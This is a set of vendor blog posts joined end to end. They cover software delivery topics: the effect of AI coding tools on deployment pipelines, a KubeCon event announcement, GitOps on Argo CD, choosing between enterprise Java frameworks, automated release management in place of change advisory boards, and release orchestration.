
Over the last few years, something fundamental has changed in software development.
If the early 2020s were about adopting AI coding assistants, the next phase is about what happens after those tools accelerate development. Teams are producing code faster than ever. But what I’m hearing from engineering leaders is a different question:
What’s going to break next?
That question is exactly what led us to commission our latest research, State of DevOps Modernization 2026. The results reveal a pattern that many practitioners already sense intuitively: faster code generation is exposing weaknesses across the rest of the software delivery lifecycle.
In other words, AI is multiplying development velocity, but it’s also revealing the limits of the systems we built to ship that code safely.
One of the most striking findings in the research is something we’ve started calling the AI Velocity Paradox - a term we coined in our 2025 State of Software Engineering Report.
Teams using AI coding tools most heavily are shipping code significantly faster. In fact, 45% of developers who use AI coding tools multiple times per day deploy to production daily or faster, compared to 32% of daily users and just 15% of weekly users.
At first glance, that sounds like a huge success story. Faster iteration cycles are exactly what modern software teams want.
But the data tells a more complicated story.
Among those same heavy AI users:
What this tells me is simple: AI is speeding up the front of the delivery pipeline, but the rest of the system isn’t scaling with it. It’s like we are running trains faster than the tracks they are built for. Friction builds, the ride is bumpy, and it seems we could be on the edge of disaster.

The result is friction downstream, more incidents, more manual work, and more operational stress on engineering teams.
To understand why this is happening, you have to step back and look at how most DevOps systems actually evolved.
Over the past 15 years, delivery pipelines have grown incrementally. Teams added tools to solve specific problems: CI servers, artifact repositories, security scanners, deployment automation, and feature management. Each step made sense at the time.
But the overall system was rarely designed as a coherent whole.
In many organizations today, quality gates, verification steps, and incident recovery still rely heavily on human coordination and manual work. In fact, 77% say teams often have to wait on other teams for routine delivery tasks.
That model worked when release cycles were slower.
It doesn’t work as well when AI dramatically increases the number of code changes moving through the system.
Think of it this way: If AI doubles the number of changes engineers can produce, your pipelines must either:
Otherwise, the system begins to crack under pressure. The burden often falls directly on developers to help deploy services safely, certify compliance checks, and keep rollouts continuously progressing. When failures happen, they have to jump in and remediate at whatever hour.
These manual tasks, naturally, inhibit innovation and cause developer burnout. That’s exactly what the research shows.
Across respondents, developers report spending roughly 36% of their time on repetitive manual tasks like chasing approvals, rerunning failed jobs, or copy-pasting configuration.
As delivery speed increases, the operational load increases. That burden often falls directly on developers.
The good news is that this problem isn’t mysterious. It’s a systems problem. And systems problems can be solved.
From our experience working with engineering organizations, we've identified a few principles that consistently help teams scale AI-driven development safely.
When every team builds pipelines differently, scaling delivery becomes difficult.
Standardized templates (or “golden paths”) make it easier to deploy services safely and consistently. They also dramatically reduce the cognitive load for developers.
Speed only works when feedback is fast.
Automating security, compliance, and quality checks earlier in the lifecycle ensures problems are caught before they reach production. That keeps pipelines moving without sacrificing safety.
Feature flags, automated rollbacks, and progressive rollouts allow teams to decouple deployment from release. That flexibility reduces the blast radius of new changes and makes experimentation safer.
It also allows teams to move faster without increasing production risk.
Automation alone doesn’t solve the problem. What matters is creating a feedback loop: deploy → observe → measure → iterate.
When teams can measure the real-world impact of changes, they can learn faster and improve continuously.
AI is already changing how software gets written. The next challenge is changing how software gets delivered.
Coding assistants have increased development teams' capacity to innovate. But to capture the full benefit, the delivery systems behind them must evolve as well.
The organizations that succeed in this new environment will be the ones that treat software delivery as a coherent system, not just a collection of tools.
Because the real goal isn’t just writing code faster. It’s learning faster, delivering safer, and turning engineering velocity into better outcomes for the business.
And that requires modernizing the entire pipeline, not just the part where code is written.

KubeCon 2025 Atlanta is here! For the next four days, Atlanta is the undisputed center of the cloud native universe. The buzz is palpable, but this year, one question seems to be hanging over every keynote, session, and hallway track: AI.
We've all seen the impressive demos. But as developers and engineers, we have to ask the hard questions. Can AI actually help us ship code better? Can it make our complex CI/CD pipelines safer, faster, and more intelligent? Or is it just another layer of hype we have to manage?
At Harness, we believe AI is the key to solving software delivery's biggest challenges. And we're not just talking about it—we're here to show you the code with Harness AI, purpose-built to bring intelligence and automation to every step of the delivery process.
We are thrilled to team up with Google Cloud to present a special lightning talk on Agentic AI and its practical use in CI/CD. This is where the hype stops and the engineering begins.
Join our Director of Product Marketing, Chinmay Gaikwad, for this deep-dive session.

Chinmay will be on hand to demonstrate how Agentic AI is moving from a concept to a practical, powerful tool for building and securing enterprise-grade pipelines. Be sure to stop by, ask questions, and get personalized guidance.
AI is our big theme, but we're everywhere this week, focusing on the core problems you face. Here's where to find us.
1. Main Event: The Harness Home Base (Nov 11-13)
This is our command center. Come by Booth #522 to see live demos of our Agentic AI in action. You can also talk to our engineers about the full Harness platform, including how we integrate with OpenTofu, empower platform engineering teams, and help you get a handle on cloud costs. Plus, we have the best swag at the show.
2. Co-located Event: Platform Engineering Day (Nov 10)
As a Platinum Sponsor, we're kicking off the week with a deep focus on building Internal Developer Platforms (IDPs). Stop by Booth #Z45 to chat about building "golden paths" that developers will actually love and how to prove the value of your platform.
3. Co-located Event: OpenTofu Day (Nov 10)
We are incredibly proud to be a Gold Sponsor of OpenTofu Day. As one of the top contributors to the OpenTofu project, our engineers are in the trenches helping shape the future of open-source Infrastructure as Code.
The momentum is undeniable:
Our engineers have contributed major features like the AzureRM backend rewrite and the new Azure Key Provider, and we serve on the Technical Steering Committee. Come find us in Room B203 to meet the team and talk all things IaC.
Can't wait? Download the digital copy of The Practical Guide to Modernizing Infrastructure Delivery and AI-Native Software Delivery right now.
KubeCon 2025 Atlanta is about what's next. This year, "what's next" is practical AI, smarter platforms, and open collaboration. We're at the center of all three.
See you on the floor!

Harness GitOps builds on the Argo CD model by packaging a Harness GitOps Agent with Argo CD components and integrating them into the Harness platform. The result is a GitOps architecture that preserves the Argo reconciliation loop while adding visibility, audit, and control through Harness SaaS.
At the center of the architecture is the Argo CD cluster, sometimes called the control cluster. This is where both the Harness GitOps Agent and Argo CD’s core components run:
The control cluster can be deployed in two models:
The Argo CD Application Controller applies manifests to one or more target clusters by talking to their Kubernetes API servers.
Developers push declarative manifests (YAML, Helm, or Kustomize) into a Git repository. The GitOps Agent and repo-server fetch these manifests. The Application Controller continuously reconciles the cluster state against the desired state. Importantly, clusters never push changes back into Git. The repository remains the single source of truth. Harness configuration, including pipeline definitions, can also be stored in Git, providing a consistent Git-based experience.
While the GitOps loop runs entirely in the control cluster and target clusters, the GitOps Agent makes outbound-only connections to Harness SaaS.
Harness SaaS provides:
All sensitive configuration data, such as repository credentials, certificates, and cluster secrets, remain in the GitOps Agent’s namespace as Kubernetes Secrets and ConfigMaps. Harness SaaS only stores a metadata snapshot of the GitOps setup (Applications, ApplicationSets, Clusters, Repositories, etc.), never the sensitive data itself. Unlike some SaaS-first approaches, Harness never requires secrets to leave your cluster, and all credentials and certificates remain confined to your Kubernetes namespace.

In short: a developer commits, Argo fetches and reconciles, and the GitOps Agent reports status back to Harness SaaS for governance and visibility.
This is the pure GitOps architecture: Git defines the desired state, Argo CD enforces it, and Harness provides governance and observability without altering the core reconciliation model.

Most organizations operate more than one Kubernetes cluster, often spread across multiple environments and regions. In this model, each region has its own Argo CD control cluster. The control cluster runs the Harness GitOps Agent alongside core Argo CD components and reconciles the desired state into one or more target clusters such as dev, QA, or prod.
The flow is straightforward:
Harness SaaS aggregates data from all control clusters, giving teams a single view and a single place to drive rollouts:
This setup preserves the familiar Argo CD reconciliation loop inside each control cluster while extending it with Harness’ governance, observability, and promotion pipelines across regions.
Note: Some enterprises run multiple Argo CD control clusters per region for scale or isolation. Harness SaaS can aggregate across any number of clusters, whether you have two or two hundred.
Harness GitOps lets you scale from single clusters to a fleet-wide GitOps model with unified dashboards, governance, and pipelines that promote with confidence and roll back everything when needed. Ready to see it in your stack? Get started with Harness GitOps and bring enterprise-grade control to your Argo CD deployments.


When you're architecting an enterprise Java application, one decision quietly shapes everything downstream: runtime footprint, deployment pipelines, and how your platform team handles incidents at 3 a.m. For two decades, that decision was framed as Java SE vs Java EE. In 2026, that framing has quietly inverted.
Nearly every modern enterprise Java app runs on Java SE 21 or 25 LTS. The real choice now sits one layer up: which framework or runtime sits on top of the JVM. Spring Boot. Quarkus. Helidon. Micronaut. Vanilla Jakarta EE on Open Liberty, Payara, or WildFly. These options have converged on the same underlying APIs. Spring Boot 3 and 4 sit on jakarta.* packages, the same namespace Jakarta EE itself uses. But they differ sharply in startup time, memory footprint, deployment topology, and what your CI/CD pipeline has to do to ship them safely.
This guide is for the platform engineer, architect, or staff engineer who needs to make that call once and live with it across dozens of services. We'll cover what changed, where the stacks still diverge, and how to standardize delivery across a mixed Java fleet without forcing consolidation no team wants.
Java SE (Standard Edition) is the foundation of every Java application, from a five-line script to a globally distributed system. It's the language, the runtime, and the core libraries every Java program assumes is there.
But describing Java SE as just "the foundation" undersells what's happened to it in the last three years. Java SE in 2026 is not the Java SE of 2018.
At its core, Java SE includes:
These pieces form the runtime baseline that every Java framework, including Spring Boot, Quarkus, and Jakarta EE implementations, sits on top of.
If you've been away from the platform for a few years, four changes are worth knowing about before you make any architectural decisions:
Virtual threads (stable in Java 21). Project Loom collapsed the cost of a thread from megabytes of stack to a few hundred bytes. A single JVM can now run millions of concurrent virtual threads. This is the biggest concurrency change in Java's history and it removes the main argument for reactive frameworks like WebFlux on most workloads. Blocking code is fast again.
AOT compilation and native images. GraalVM native image and the JDK's own ahead-of-time caching turn Java apps into binaries that start in tens of milliseconds and use a fraction of the memory of a warm JVM. This used to be a Quarkus or Micronaut differentiator. It's now table stakes across the ecosystem, including Spring Boot 3+.
Records, sealed classes, and pattern matching. The boilerplate that used to push teams toward Lombok or Kotlin is mostly gone. Data-oriented programming in modern Java looks closer to Scala or Kotlin than to Java 8.
Java 25 LTS performance work. Compact object headers shrink object overhead by roughly 22% on heap-heavy workloads. The G1 garbage collector got a redesigned card table in Java 26 that delivers measurable throughput gains on reference-heavy code.
Plain Java SE is honest about its scope. It does not give you:
You can build all of these by hand. Almost no one does. In practice, "I'm using Java SE" in 2026 means "I'm using Java SE plus a framework that supplies the missing pieces." That framework is the actual decision, which is where the rest of this guide focuses.
Jakarta EE is the modern successor to Java EE, the standardized set of APIs and specifications for building enterprise-scale Java applications. If you wrote enterprise Java between 2000 and 2017, you wrote Java EE. Everything since 2018 is Jakarta EE.
The name change wasn't cosmetic. It came with a migration that every Java team upgrading in 2026 still has to plan for.
Oracle transferred Java EE to the Eclipse Foundation in 2017. The platform was renamed Jakarta EE because Oracle retained the "Java" trademark. Java EE 8 (2017) was the last release under the old name. Jakarta EE 8 (2019) was the same platform under new governance.
Then came the breaking change. Starting with Jakarta EE 9 (2020), every package was renamed from javax.* to jakarta.*. An import that used to read import javax.persistence.Entity now reads import jakarta.persistence.Entity. The change was mechanical, but it touched every file in every Jakarta EE codebase on the planet, and it forced every framework that depended on those APIs to publish a major-version break.
This is why Spring Boot 3 (late 2022) was a hard upgrade. Spring Boot 3 dropped javax.* and adopted jakarta.*. Any Spring Boot 2.x application moving to 3.x or 4.x has to migrate the namespace. Tools like Eclipse Transformer and OpenRewrite automate most of it, but the migration is still the gating event for many platform upgrades happening in 2026.
Jakarta EE 11, released in 2025, is the current stable platform. Jakarta EE 12 is in development. The headline specifications most teams interact with are:
If you're a Spring developer, several of these will look familiar. That's not coincidence. Spring's annotations and patterns shaped Jakarta EE's modernization, and Jakarta EE's specifications now define the underlying APIs Spring builds on. The two ecosystems converged.
A common objection to Jakarta EE is that it's too heavy for microservices. Jakarta EE 10 answered this directly with the Core Profile: a minimal subset of specifications (CDI Lite, JAX-RS, JSON-P, JSON-B, Annotations, Interceptors, Dependency Injection) explicitly designed for lightweight cloud-native runtimes and AOT compilation.
The Core Profile is what runtimes like Quarkus implement when they want Jakarta EE compatibility without the full platform's footprint. It's the answer to "Jakarta EE doesn't fit in a container." It does. The original critique was about WebSphere and WebLogic, not about Jakarta EE the specification.
In 2026, picking Jakarta EE doesn't mean picking a multi-gigabyte application server. The runtimes teams actually choose are:
The legacy "heavyweight Java EE" stereotype belongs to WebSphere full profile and WebLogic. Those are real products with real footprints, but in 2026 they're an active migration target, not a forward choice for new development.

Figure: Modern enterprise Java is a layered stack. Frameworks and runtimes pick their packaging and opinions, but they all sit on the same jakarta.* API surface and the same JVM.
By this point in the article, the framing should be obvious: Spring Boot, Quarkus, Helidon, Micronaut, and vanilla Jakarta EE on Open Liberty or Payara are not five different platforms. They're five different opinions sitting on the same jakarta.* APIs and the same JVM. So how do teams actually decide?
In practice, four signals do most of the work.
Signal 1: What does the rest of your fleet run?
The single biggest predictor of which stack a new service uses is which stack the team's other services already use. This is not laziness. It's a sound platform decision. Two services on the same framework share build tooling, base container images, observability libraries, configuration patterns, deployment templates, and on-call runbooks. A team running 40 Spring Boot services will pay a real operational tax to introduce a Quarkus service, even if Quarkus is technically the better fit for that one workload.
The exception is when the new workload has a specific profile that the existing stack genuinely can't serve well. A Spring Boot shop building one event-driven function that needs to scale to zero on AWS Lambda has a legitimate reason to reach for Quarkus or a native Spring Boot image. A Jakarta EE shop building one async data-processing service has a legitimate reason to reach for Spring Boot's mature integration ecosystem. The decision rule is not "best tool for the job in isolation," it's "best tool given what we already operate."
Signal 2: What's the deployment target?
The deployment target matters more than most architecture discussions admit. Three patterns dominate:
Signal 3: What's the team's reactive vs imperative bias?
Five years ago, this was a religious debate. Virtual threads have mostly settled it for new code. But existing services that are already reactive don't get a free migration, and teams that have built fluency with Project Reactor, RxJava, or Mutiny will keep getting value from those investments.
The practical guidance:
Signal 4: How much governance do you need?
This is the question that quietly distinguishes Jakarta EE from Spring Boot in regulated environments. Jakarta EE is a specification with multiple compatible implementations. A regulated bank or insurer can require "any Jakarta EE 11 compatible runtime" in a procurement document and have meaningful vendor portability. Spring Boot is a single implementation, governed by VMware. That's fine for most teams. It's a real consideration for organizations with compliance requirements around vendor lock-in.
Quarkus, Helidon, and Open Liberty all sit on the Jakarta EE side of this line because they implement Jakarta EE specifications. Spring Boot does not, despite using jakarta.* packages. The distinction matters less than it used to, but it has not gone away.
The takeaway
The convergence at the API layer means most teams can pick any of these stacks and ship perfectly good software. The choice is no longer a technology bet. It's a fit-to-fleet, fit-to-deployment-target, and fit-to-governance-model decision. The teams that get this wrong are the ones still litigating it as a technology choice.
Stack choice does not end at deployment. It shapes how your services emit telemetry, how incidents propagate, and how quickly your platform team can pin down the root cause when something breaks at 2 a.m. The convergence story makes parts of this easier (shared APIs mean shared observability standards) and parts of it harder (mixed fleets mean more surface area for incidents to hide in).
Three operational realities worth thinking through.
The 2026 platform team rarely operates a single-framework fleet. Most enterprise Java estates look like this: a long tail of Spring Boot services, a growing edge of Quarkus or native-compiled services for cold-start-sensitive workloads, and a stable core of older Jakarta EE applications running on Open Liberty, Payara, or WildFly. Sometimes a few WebLogic or WebSphere systems are still in active modernization.
This mix is fine. It reflects real organizational decisions made over time. But it means your reliability strategy cannot assume framework homogeneity. Health endpoint conventions, log formats, metric names, and tracing instrumentation differ across these stacks unless you actively unify them. The teams that struggle most with incident response are the ones who let each service team pick its own conventions.
OpenTelemetry has become the cross-stack standard for traces, metrics, and logs in enterprise Java. Spring Boot, Quarkus, Helidon, Micronaut, and most Jakarta EE runtimes all ship with OpenTelemetry instrumentation either built-in or one dependency away. This is genuinely good news for platform teams.
The catch: standardization at the protocol layer does not give you standardization at the convention layer. Two services emitting OpenTelemetry traces can still tag spans with completely different attribute names. Two services emitting metrics can still use different naming conventions for the same operation. AI SRE platforms perform best when the signals they ingest are semantically consistent. That consistency is a platform-engineering decision, not a framework decision.
The practical guidance: pick a single OpenTelemetry semantic convention (the OTel HTTP and database conventions are reasonable defaults) and enforce it across stacks through your shared observability libraries. The framework choice does not matter as much as whether you've made the convention choice at all.
A typical Spring Boot service on the JVM takes 2 to 5 seconds to start, hits steady-state CPU and memory after another 30 to 60 seconds of JIT warmup, and produces meaningful traces and metrics throughout. A Quarkus native binary starts in under 100 milliseconds and reaches steady state immediately. These are different operational profiles. They produce different incident patterns.
Spring Boot deployments tend to fail visibly during startup or warmup. Native deployments tend to fail at build time or never. Spring Boot scaling events are slower and more forgiving. Native scaling events are faster but more brittle when something is wrong with the binary itself. AI SRE platforms detect anomalies based on baselines, and your baselines should reflect the runtime profile of the service being monitored. A 3-second startup that is normal for a JVM service is a critical anomaly for a native service.
This is where AI SRE platforms like Harness AI SRE become operationally meaningful. In a single-framework fleet, a senior SRE can mostly hold the operational model in their head. In a mixed fleet of 50 to 500 services across Spring Boot, Quarkus, and legacy Jakarta EE, no human can. The questions AI SRE answers well are exactly the questions mixed-fleet teams ask:
These questions are tractable for AI when the underlying telemetry is consistent. They are intractable for humans regardless of telemetry quality. That's the operational case for treating AI SRE as platform infrastructure rather than as a tool individual teams adopt.
The framework choice shapes the data. The platform decision is what you do with it.
See how Harness AI SRE correlates incidents across mixed Java fleets.
The honest answer to "which Java stack should we use" depends on what you're building, what you already operate, and what your deployment target looks like. The matrix below is opinionated and concrete. Use it as a starting point, not a final answer.
Choose when:
Avoid when:
Current version baseline: Spring Boot 4.0 (released late 2025), running on Java 21 or 25 LTS. Spring Boot 3.x remains a reasonable choice for teams not ready to upgrade Spring Framework to 7.
Choose when:
Avoid when:
Choose when:
Avoid when:
Choose when:
Avoid when:
Choose when:
Avoid when:
Neither of these is a forward choice in 2026. Both are real products with real production footprints, but new development on them is rare outside very specific enterprise circumstances. If you're running WebSphere full profile or WebLogic, the relevant question is the modernization path: typically Open Liberty (the IBM-supported migration target from WebSphere) or Helidon and WildFly (common WebLogic migration targets).
If you've read this far and the matrix still feels like five reasonable options, default to one of two answers:
For everything else, the matrix above is a tiebreaker. The decision rule that beats every other rule is: pick the framework your platform team can operate well at 2 a.m.
The article has been pushing toward one conclusion: in 2026, most enterprise Java estates are mixed-framework by design, and the platform team's job is to make that mix operable rather than to force consolidation.
What that looks like concretely:
A Spring Boot core handles the long tail of CRUD services and customer-facing APIs. A handful of Quarkus or native Spring Boot services sit at the edges where cold start matters: serverless functions, event handlers, scale-to-zero workloads. A stable set of Jakarta EE applications on Open Liberty or Payara handles the deeply-integrated systems that have been running reliably for years and would cost more to rewrite than to maintain. Java 21 is the floor across all of it, with a planned migration to Java 25 LTS over the next 12 to 18 months.
This is not an architectural compromise. It is the correct answer for organizations that have grown over time and have services with genuinely different operational profiles. The mistake is treating the mix as a problem to solve rather than an environment to operate.
When a team proposes adding a new service to the fleet, four questions separate good decisions from defaults:
These questions matter more than any framework comparison because they're the questions a senior platform engineer asks before writing the first line of code. The frameworks themselves have converged enough that the operational fit dominates the technical fit.
The four questions at the end of the previous section all point at the same operational problem. A platform team running a mixed-framework Java fleet faces the same delivery bottleneck regardless of which frameworks are in the mix: ticket-ops and pipeline sprawl that compound with every new service.
The frameworks have converged. The pipelines have not. Most enterprise Java teams still operate one CI/CD configuration for Spring Boot, a different one for Quarkus, a third for Jakarta EE on Open Liberty or Payara, and a long tail of bespoke automation for whatever legacy systems are still in flight. Every new service adds operational surface area. Every framework upgrade creates a coordination problem.
This is the layer where AI-powered continuous delivery and GitOps practices stop being aspirational and become structural. Pull-based deployments through GitOps eliminate the manual approval steps that previously gated Spring Boot rollouts but not Quarkus ones. Policy as Code guardrails enforce the same release strategies, security requirements, and resource limits across every framework in the fleet. Automated verification catches deployment anomalies against each service's own baseline, whether that baseline is a 3-second JVM startup or a 50-millisecond native cold start. Intelligent rollbacks protect production without requiring on-call engineers to remember which framework needs which recovery playbook.
The platform decision is no longer which Java framework to standardize on. It's how to operate the mix you already have without paying a coordination tax on every change.
Java SE is the language, JVM, and core libraries every Java application runs on. Jakarta EE is a set of standardized APIs (CDI, Jakarta Persistence, Jakarta REST, Servlet, Jakarta Data, and others) that extend Java SE for enterprise applications. In 2026, the choice is rarely between Java SE and Jakarta EE directly. It's between frameworks and runtimes (Spring Boot, Quarkus, Helidon, Micronaut, Open Liberty, Payara, WildFly) that all sit on Java SE and most of which implement or interoperate with the Jakarta EE specifications.
Jakarta EE is the direct successor to Java EE under new governance at the Eclipse Foundation. Oracle transferred Java EE to Eclipse in 2017 and the platform was renamed because Oracle retained the "Java" trademark. Java EE 8 (2017) was the last release under the old name. Jakarta EE 8 (2019) was the same platform under the new name. Jakarta EE 11 (2025) is the current stable version.
Starting with Jakarta EE 9 in 2020, every Jakarta EE package was renamed from javax.* to jakarta.*. An import that used to read import javax.persistence.Entity now reads import jakarta.persistence.Entity. Spring Boot 3 (late 2022) and Spring Boot 4 both require the new namespace, which means any Spring Boot 2.x application upgrading to 3.x has to migrate every affected import. Tools like Eclipse Transformer and OpenRewrite automate most of the migration, but it remains the gating event for many platform upgrades happening in 2026.
For most greenfield services, Spring Boot is the path of least resistance because of its ecosystem and hiring advantages. Choose a Jakarta EE runtime like Quarkus when cold start time and memory footprint are your dominant operational costs, when you need native compilation as a first-class concern, or when procurement requires multi-vendor specification compatibility. The technical capabilities have largely converged. The decision is mostly about ecosystem fit, deployment target, and what your platform team already operates well.
On the JVM, a typical Spring Boot service starts in 2 to 5 seconds and runs in 200 to 400 MB, while a Quarkus service starts closer to 1 second and runs in 150 to 250 MB. As GraalVM native binaries, both Spring Boot (via Spring AOT) and Quarkus start in 30 to 100 milliseconds and run in 30 to 80 MB. The real performance difference shows up in cold-start-sensitive deployments like serverless and scale-to-zero workloads, where native compilation moves from a nice-to-have to a requirement.
Java 21 LTS is the production baseline for most enterprise Java fleets, and Java 25 LTS (released September 2025) is what platform teams are migrating to over the next 12 to 18 months. Java 17 should be treated as the floor, not the target. Avoid non-LTS releases (currently Java 26) for production unless you have a specific reason to track preview features, since support windows for non-LTS versions are six months. Both Spring Boot 4 and Jakarta EE 11 support Java 21 with first-class enhancements when running on Java 25.
Yes, and most enterprise Java fleets do exactly this. The technical compatibility is straightforward because both stacks produce standard container images and both expose health, metrics, and logs through OpenTelemetry-compatible instrumentation. The harder problem is operational consistency: enforcing the same release strategies, observability conventions, and governance policies across both stacks. Policy-as-code and unified delivery pipelines solve this regardless of which frameworks are in the mix.
Java EE under that name ended in 2017, but the platform is alive and actively developed under the Jakarta EE name at the Eclipse Foundation. Jakarta EE 11 shipped in 2025 with new specifications including Jakarta Data and first-class virtual thread support. Modern runtimes like Quarkus, Helidon, Open Liberty, Payara, and WildFly implement Jakarta EE specifications in cloud-native form. The "Java EE is dead" narrative was specifically about heavyweight application servers like WebLogic and WebSphere full profile, which are an active migration target rather than a forward choice.
Experience AI-powered continuous delivery and native GitOps with Harness


The thing with Change Advisory Boards is that the intent was always good. Get smart people in a room, look at the evidence, and make sure nothing catastrophic goes out the door. In theory, that's hard to argue with.
It doesn't scale in practice. Things happen between meetings. Teams rush to hit the window. The CAB meeting may not catch every risky deployment, but at least everyone can feel good about the process before the incident happens.
Automated release management asks a different question entirely. Not "did a human approve this?" but "has this change actually proven it's safe?" Governance moves into the pipeline itself, running the same checks on every change at whatever speed your teams ship.
That's exactly what Harness Continuous Delivery is built for: policy-driven pipelines, automated assurance, and governance that scales with your teams.
Automated release management replaces manual review and approval steps with automated quality gates, policy enforcement, and deployment orchestration.
Rather than routing change decisions through a central committee, automated systems evaluate each change against defined criteria like test coverage, security scans, rollback definitions and compliance checks, then approve or block it based on objective results.
That does not get rid of governance. It brings governance into the delivery pipeline and consistently applies it to all changes, not just the ones that make it onto a CAB agenda.
Automated release management paired with a continuous delivery platform allows teams to deploy frequently, recover quickly, and audit completely, with no meeting necessary.
The CAB model made sense when software changed slowly and release cycles were long. Cross-functional stakeholders would review evidence packets, testing results, deployment plans, security scans and determine if a release was safe to promote.
The problem is that the model doesn't scale well as the speed of delivery accelerates. Some patterns keep repeating themselves:
DORA's research provides a useful gut-check here: high-performing engineering teams deploy far more frequently than their peers with lower change failure rates, not higher. It's not approval volume that matters; it's pipeline discipline.
The fundamental problem is not that governance is bad. It is that a meeting-based governance model cannot keep up with a continuous delivery operating model.
The difference in automated release management boils down to a different question at the heart of the process.
Old model: Who approved this? New model: What did this change prove before we shipped it?
That reframe yields a meaningfully different architecture. Governance takes place on every change, not at scheduled times. Pass/fail criteria are deterministic, not subjective. Compliance is an output of the pipeline, not a prerequisite to enter it.

All changes must be traceable without requiring manual compilation. Version control becomes the single source of truth. CI systems automatically generate commit history, build artifacts and deployment-linked changelogs as part of normal pipeline execution. By default, the audit trail is there.
Harness GitOps takes this a step further, using Git as the single source of truth for the state of the deployment. All configuration changes are versioned, all deployments are tracked, and drift is detected automatically.
Validation moves from presentations to execution. Quality gates run on every change: unit and integration tests, end-to-end validation, security and compliance scans, and performance checks. These are not release-window activities. They are part of the standard CI/CD pipeline, running continuously on every change that moves through.
Harness Powerful Pipelines supports multi-stage pipeline orchestration across complex environments with built-in test intelligence and conditional execution logic. Quality gates run fast and don't create unnecessary bottlenecks.
CAB rules get codified in an automated release management model. No critical vulnerabilities before production promotion. Minimum thresholds for test coverage. Mandatory rollback procedure definitions. These policies are automatically enforced in the pipeline. Pass, and the change proceeds. Fail, and it's reliably blocked at scale, with no human bottleneck in the critical path.
That's what policy as code is all about: governance that's version-controlled, auditable and applied the same way every time.
Harness DevOps Pipeline Governance lets teams define and enforce pipeline policies in one place. Compliance is not something you check at the end. It's something the pipeline enforces throughout.
Even with strong quality gates, production deployments carry residual risk. Test environments do not always mirror what production surfaces.
Harness AI-Assisted Deployment Verification automatically analyzes deployment health using ML to compare metrics, logs and traces against baseline behavior. When something drifts, it surfaces the signal quickly, enabling rollback before an incident escalates. This closes the loop between deployment and validation, making the pipeline genuinely self-correcting, not just self-approving.
In practice, systems rarely exist in isolation. One change can affect backend services, APIs, web apps, mobile apps and edge targets all at once. In tightly coupled systems, changes to one component can cause another to break, and partial deployments can be risky without careful coordination.
Traditional coordination uses spreadsheets, emails, and war rooms. Modern automated release management means orchestration: platforms that model service dependencies, trigger pipelines in the right order, and ensure all components pass quality gates before release. Multi-team coordination becomes a single-action, end-to-end deployment.
Harness Continuous Delivery has built-in support for orchestrated multi-service deployments with dependency mapping and conditional promotion logic. Deploy Anywhere extends this to cloud, hybrid, on-prem and edge environments without requiring separate toolchains for each target.
Harness pipelines also support canary deployments and GitOps-based progressive delivery for rollout strategies tailored to deployment risk.
Managing interdependent releases is a good start. The goal is to reduce the coupling itself so teams can ship independently without synchronized multi-team deployments. Three practices tend to accelerate that:
Together, these patterns move teams toward the continuous delivery ideal: frequent, small, independent releases, each of which is safe on its own.
The results of replacing CAB-driven processes with policy-driven pipelines and automated assurance are measurable:
Harness CD Visualize DevOps Data surfaces deployment frequency, change failure rates and mean time to recovery in real time. These are the DORA metrics that measure delivery health with zero instrumentation overhead.
CABs were created for a slower world, where a weekly review meeting could credibly keep up with the cadence of releases. That world is long gone for most engineering organizations today.
The takeaway here is this: automated release management doesn't remove governance. It rebuilds governance as a system that is fast, consistent, auditable and embedded directly in the delivery pipeline. The teams that move fastest aren't the ones with the loosest controls. They're the ones with controls that don't slow them down.
If you're ready to move from approval bottlenecks to automated assurance, Harness Continuous Delivery is built for exactly that.
Automated release management is the practice of using automated quality gates, policy enforcement and deployment orchestration to replace manual approval steps in the software release process. Rather than routing changes to a committee, the pipeline evaluates each change against predefined criteria and approves or blocks it based on objective results.
A CAB relies on scheduled human review to approve changes before they go into production. Automated release management takes that validation and builds it into the pipeline itself, running the same checks on every change instead of batching them for periodic review. The result is faster delivery with more consistent governance.
Quality gates are automated checkpoints a change must pass before moving to the next stage. Common examples include test coverage thresholds, security scan results, and performance benchmarks. A change that fails a gate is blocked automatically, without human intervention.
Policy as code is the practice of expressing governance rules in version-controlled configuration files rather than documents or meeting agendas. The pipeline then automatically enforces those rules on every deployment, making compliance consistent and auditable by default.
Feature flags decouple code deployment from feature activation. Teams can ship code continuously without exposing unfinished features to users, and can disable a feature instantly if it causes issues in production, without triggering a full rollback.
Incremental strategies like canary deployments work well because they limit the blast radius of any given change. Paired with automated verification, the pipeline can catch problems early in the rollout and halt or roll back before they affect all users.
Harness Continuous Delivery provides end-to-end pipeline orchestration, built-in policy governance, GitOps-based change tracking, AI-assisted deployment verification, and real-time DORA metrics. It's designed to replace manual release processes with automated systems that scale across any environment.


Modern software delivery has evolved far beyond single-service deployments. Today's releases span dozens of services, multiple teams, and complex approval workflows—coordinated through spreadsheets, Slack channels, and manual checklists scattered across tools. When a production release involves deploying ten microservices across three environments, enabling five feature flags, running security scans, collecting approvals from four stakeholders, and coordinating with three different teams, the question isn't whether you can ship—it's whether you can track what shipped, when it shipped, and who approved it.
Release Orchestration solves this. It provides a unified framework for modeling, scheduling, automating, and tracking complex software releases across teams, tools, and environments—giving you end-to-end visibility from planning through production deployment and monitoring.
Without orchestration, enterprise releases become coordination nightmares. Status lives in spreadsheets that go stale within hours. Coordination happens through email threads spanning dozens of messages. There's no single source of truth for what was deployed, when, or by whom. Manual checklists drift out of sync. Approval workflows rely on memory and goodwill. And when something goes wrong at 2 AM, reconstructing what happened requires археology across multiple systems.
Release Orchestration transforms this chaos into structured, auditable, repeatable processes. Model your release blueprint once—defining phases, activities, dependencies, and approval gates—then execute it repeatedly with different configurations. Automate pipeline-backed steps while retaining manual sign-offs where governance requires them. Track activity-level status, phase-level progress, and overall release health in real time. Enforce approvals, capture sign-offs, and maintain a full audit trail linking code to deployment to business outcome.
The result? Releases that used to require days of coordination now run faster with complete visibility and zero spreadsheets.
Release Orchestration introduces a structured, visual approach to modeling and executing releases. Define Processes—reusable blueprints composed of Phases (Build, Testing, Deployment) and Activities (automated pipelines, manual approvals, or nested subprocesses). Release Groups define cadences and automatically generate releases. The Release Calendar provides unified visibility across all releases. The Activity Store and Input Store promote reusability—define once, execute many times with different configurations. And ad hoc releases let you execute any process on demand when you need flexibility outside your regular schedule.
At its core, Release Orchestration delivers the foundational capabilities enterprise teams need: process modeling with visual editors, scheduled and recurring releases through release groups, real-time execution tracking with dependency management, comprehensive audit trails for compliance, and AI-powered process creation that transforms natural language descriptions into structured workflows. These capabilities form the foundation for enterprise release management at scale.
Release Orchestration launches with a comprehensive set of capabilities designed for enterprise release management. Here's what you can do today.
